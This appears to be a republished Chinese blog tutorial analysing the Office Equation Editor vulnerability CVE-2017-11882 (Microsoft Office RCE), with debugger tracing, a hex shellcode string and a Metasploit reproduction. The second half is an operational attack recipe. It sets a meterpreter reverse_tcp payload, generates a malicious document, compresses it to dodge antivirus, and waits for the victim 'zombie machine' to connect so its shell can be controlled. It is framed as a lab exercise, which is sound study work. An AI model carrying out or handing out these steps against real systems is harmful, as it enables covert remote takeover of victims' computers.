3 CVE-2017-11882漏洞分析

Posted heixiang

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了3 CVE-2017-11882漏洞分析相关的知识,希望对你有一定的参考价值。

CVE-2017-11882漏洞分析

操作系统:Windows7 32/64位 专业版、Linux

软件:office 2003 sp3

工具:OD、IDA、Python模块、msfconsole

1漏洞分析:

获取POC:

https://github.com/embedi/CVE-2017-11882 下载即可

打开例程,发现文档打开了计算器,应该是ShellCode。

查找漏洞点:

打开Microsoft Word 2003,快捷键Alt+i+o(插入、对象)打开Microsoft 公式 3.0,使用OD附加(附加后,线程,全部恢复,运行)快捷键 Alt+f+a,打开poc例程。(OD所有关于异常的选项去掉,插件-StrongOD-Options-Skip Some Exceptions去掉,不然无法断下)。

通过栈向上查找最近的函数地址

技术图片

下断点重新附加

技术图片

重新加载再次进行附加

技术图片

再次进行附加发现程序在运行到WinExec时已经破坏了栈,对栈进行向上回述

技术图片

在此函数处下断点,再次进行附加程序运行观察栈已经破坏则在反汇编窗口在此函数的头部下断点,重新附加观察

技术图片

此时栈是完整的,可以断定栈的破坏点在此时程序流程点的后面进行单步跟踪(F8)观察栈的变化找出溢出点。

技术图片

技术图片

通过Alt+e查找溢出模块,载入IDA进行静态分析

技术图片

通过溢出点在IDA快捷键 g地址跳转F5转C代码查看分析

技术图片

分析poc的ShellCode:

在OD中查看ShellCode信息

技术图片

通过010editor进行分析:

技术图片

2漏洞利用:

改写ShellCode运行时弹出百度网页。

技术图片

关于ShellCode的改写:

在OD中的Ctrl+e进行二进制编写,注意ShellCode大小,0x30预留4字节的返回地址。

机器码:

636D642E657865202F63206578706C6F7265722E65786520687474703A2F2F62616964752E636F6D266F6D73120C4300

使用 msfconsole进行远程控制的利用

相关poc获取:https://github.com/embedi/CVE-2017-11882

准备工作:

1. 在Linux虚拟机上运行 msfconsole

技术图片

2. 使用apt update;

apt intsall metasploit-framework

3. 将cve-2017-11882.rb(漏洞模块,负责与样本通信)

在终端输入cp指令:

绝对路径拷贝:

技术图片

相对路径拷贝:cd到文件所在目录

cp CVE-2017-11882.rb /usr/share/metasploitframework/modules/exploits/windows/fileformat

拷贝到相关文件夹

4. 将python脚本 CVE-2017-11882.py拷贝到桌面

开始攻击:

使用Kali Metasploit准备后门,监听程序

1. 进入metasploit-framework

命令:msfconsole 启动命令

2. Search cve-2017-11882

技术图片

3. 使用模块:use exploit/windows/fileformat/cve-2017-11882

技术图片

4. 设置漏洞利用信息,包括payloar类型,IP(Linux使用ifconfig查看IP,Win使用ipconfig查看IP)

技术图片

set payload windows/meterpteter/reverse_tcp

技术图片

技术图片

show options(显示必要设置的选项,查看有无漏项)

技术图片

5. 开始攻击

exploit

技术图片

6. 使用CVE-2017-11882.py脚本生成样本

技术图片

7. 压缩文件不然可能会被查杀

拷贝到win7 64位 专业版 使用office3 sp3打开

8. 等待肉机链接

在win7打开文件显示的内容

技术图片

9. 链接之后使用sessions查看链接信息

技术图片

10. 使用sessions 1 进入sessions,开始后门操作

技术图片

连接成功

11. 命令:shell进入shell

技术图片

出现乱码,使用 chcp 65001 即可

技术图片

此时即可使用windows shell命令控制肉机

退出shell

技术图片

截屏要退出来才可以截屏

技术图片

截屏图片

技术图片

一些其他命令

show sessions:显示会话

sessions x:进入会话

background:会话返回

back:退出模块

在msf下 exit:退出

3总结:

1. 此漏洞是使用系统的WinExec函数开启线程的

2. 漏洞的产生是因为内存拷贝时空间大小设计时没有考虑到位产生的栈溢出淹没了原返回地址

3. 因为程序间隔较近,此漏洞的shellcode空间只用0x30大小但对于使用系统WinExec创建线程来讲已经够用

4. 此漏洞是2000年就存在的陈年漏洞但危害很大,甚至可以用来远程控制电脑。

以上是关于3 CVE-2017-11882漏洞分析的主要内容,如果未能解决你的问题,请参考以下文章

CVE-2017-11882漏洞 Msf利用复现

[漏洞复现] CVE-2017-11882 通杀所有office版本

CVE-2017-11882利用

cve-2017-11882生成office恶意文件

CVE-2017-11882-Office远程代码执行漏洞复现

[漏洞复现] CVE-2017-11882 通杀所有Office版本